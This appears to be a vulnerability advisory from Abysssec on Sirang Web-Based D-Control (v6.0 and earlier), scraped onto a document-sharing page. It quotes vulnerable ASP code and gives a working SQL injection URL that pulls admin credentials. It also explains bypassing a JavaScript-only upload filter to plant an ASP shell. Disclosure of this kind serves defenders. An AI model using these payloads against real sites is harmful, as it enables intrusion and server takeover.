Sirang Web ­‐Based D ­‐Control Multiple Remote Vulnerabilities

background image

 

 

Abysssec Research

1)  Advisory  information  

 

   Title                                                :  Sirang  Web-­‐Based  D-­‐Control  Multiple  Remote  Vulnerabilities    
   Affected                                :    <=  v6.0  
   Discovery                            :    

www.abysssec.com

 

   Vendor                                    :    

http://www.sirang.com

 

   Impact                                      :    Critical

 

   Contact                                    :    shahin  [at]  abysssec.com  ,  info    [at]  abysssec.com  
   Twitter                                    :    @abysssec  
 

2)  Vulnerability  Information  

Class  

1-­‐ SQL  Injection  

2-­‐ Bypass  upload  restriction  

Exploiting this issue could allow an attacker to compromise the application, access
or modify data, or exploit latent vulnerabilities in the underlying database.

Remotely  Exploitable

Yes  

Locally  Exploitable  

No  

 

 

 

 

background image

 

3)  Vulnerabilities  detail  

 

1-­  SQL  Injection:  

Vulnerable  code  located  in  content.asp  

line  131-­‐133  

...  

       txt="select  *  from  news  where  del='false'  and  "+keyfld+"!='-­‐'  order  by  id  desc  limit  1"  
       set  rs=conn.execute(txt)  
 

while  not  rs.eof  

...  
 

content.asp  line  202-­‐206  
...  
if  id<>""  then  
                                       txt10  ="select  *  from  "+  cstr(tblname)  +"  where  del='false'  and  id='"+  id  +"'"  

                                       set  xx  =  conn.execute(txt10)  
                                       if  not  xx.eof  then  
...                            

Lots  of  files  those  will  have  to  do  input  validation  from  user  input  are  vulnerable  to  SQL  Injection.  

PoC  :  

www.site.com/main_fa.asp?status=news&newsID=23'/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/
**/from/**/dc_admin/*

 

 

note  :  if  you  can't  see  result  you  need  to  do  it  blindly  

 

2-­  Bypass  uploads  restriction:  

After  you  got  user/pass  with  SQL  injection  go  to:  

http://site.com/admin/dc_upload.asp  

function  showthumb(file)  {  
 

if  (file  !='')  {  

 

myshowfile  =  file;  

 

 

 

extArray  =  new  Array(".gif",  ".jpg",  ".png",  ".bmp",  ".jpe");  

 

allowSubmit  =  false;  

 

while  (file.indexOf("\\")  !=  -­‐1)  

 

file  =  file.slice(file.indexOf("\\")  +  1);  

 

ext  =  file.slice(file.indexOf(".")).toLowerCase();  

 

for  (var  i  =  0;  i  <  extArray.length;  i++)  {  

 

if  (extArray[i]  ==  ext)  {  allowSubmit  =  true;  break;  }  

 

}  

 

 

 

if  (allowSubmit)  thumb.src=myshowfile;  

background image

 

 

else  

 

alert("Only  files  that  end  in  types:    "  +  (extArray.join("    "))  +  "  could  be  previewd.");  

 

}  

 

else  {  

 

alert("Only  files  that  end  in  types:    "  +  (extArray.join("    "))  +  "  could  be  previewd.");  

 

}  

}  
As  you  can  see  the  uploader  will  check  malicious  extention  by  javascript  .  so  just  disable  javascript  and  
you  can  upload  "ASP"  shell.  you  can  find  your  shell  in  :  

www.site.com/0_site_com/[rnd-­‐number].asp

 

(the  application  itself  will  show  you  rnd  number  right  after  upload)  
 


Wyszukiwarka

Podobne podstrony:
PHP MicroCMS 1 0 1 Multiple Remote Vulnerabilities
JMD CMS Multiple Remote Vulnerabilities
FestOS CMS 2 3b Multiple Remote Vulnerabilities
Rainbowportal Multiple Remote Vulnerabilities
phpmyfamily Multiple Remote Vulnerabilities
DynPage Multiple Remote Vulnerabilities
aradBlog Multiple Remote Vulnerabilities
FreeDiscussionForums Multiple Remote Vulnerabilities
IfNuke Multiple Remote Vulnerabilities
Nghiên cứu sự làm việc đồng thời móng băng, bè cọc và nền đất Ks Phan Huy Đông
PYT M, Wyja˙ni˙ poj˙cia : b˙˙d bezwzgl˙dny, wzgl˙dny, zakresowy.
gausCMS Multiple Vulnerabilities
Giám Sát Và Nghiệm Thu Kết Cấu Bê Tông Cốt Thép Toàn Khối Lê Trung Nghĩa, 74 Trang
ĐHKT Giám Sát Thi Công Và Nghiệm Thu Công Tác Bê Tông Cốt Thép Pgs Ts Lê Kiều, 60 Trang
ĐHTN Giáo Trình Môn Học Xử Lý Ảnh Ts Đỗ Năng Toàn & Ts Phạm Việt Bình, 76 Trang
Các Vấn Đề Quản Lý Chất Lượng Điện Lực Miền Bắc, 58 Trang
Mozilla Firefox CSS font face Remote Code Execution Vulnerability
Apple QuickTime FlashPix NumberOfTiles Remote Code Execution Vulnerability

więcej podobnych podstron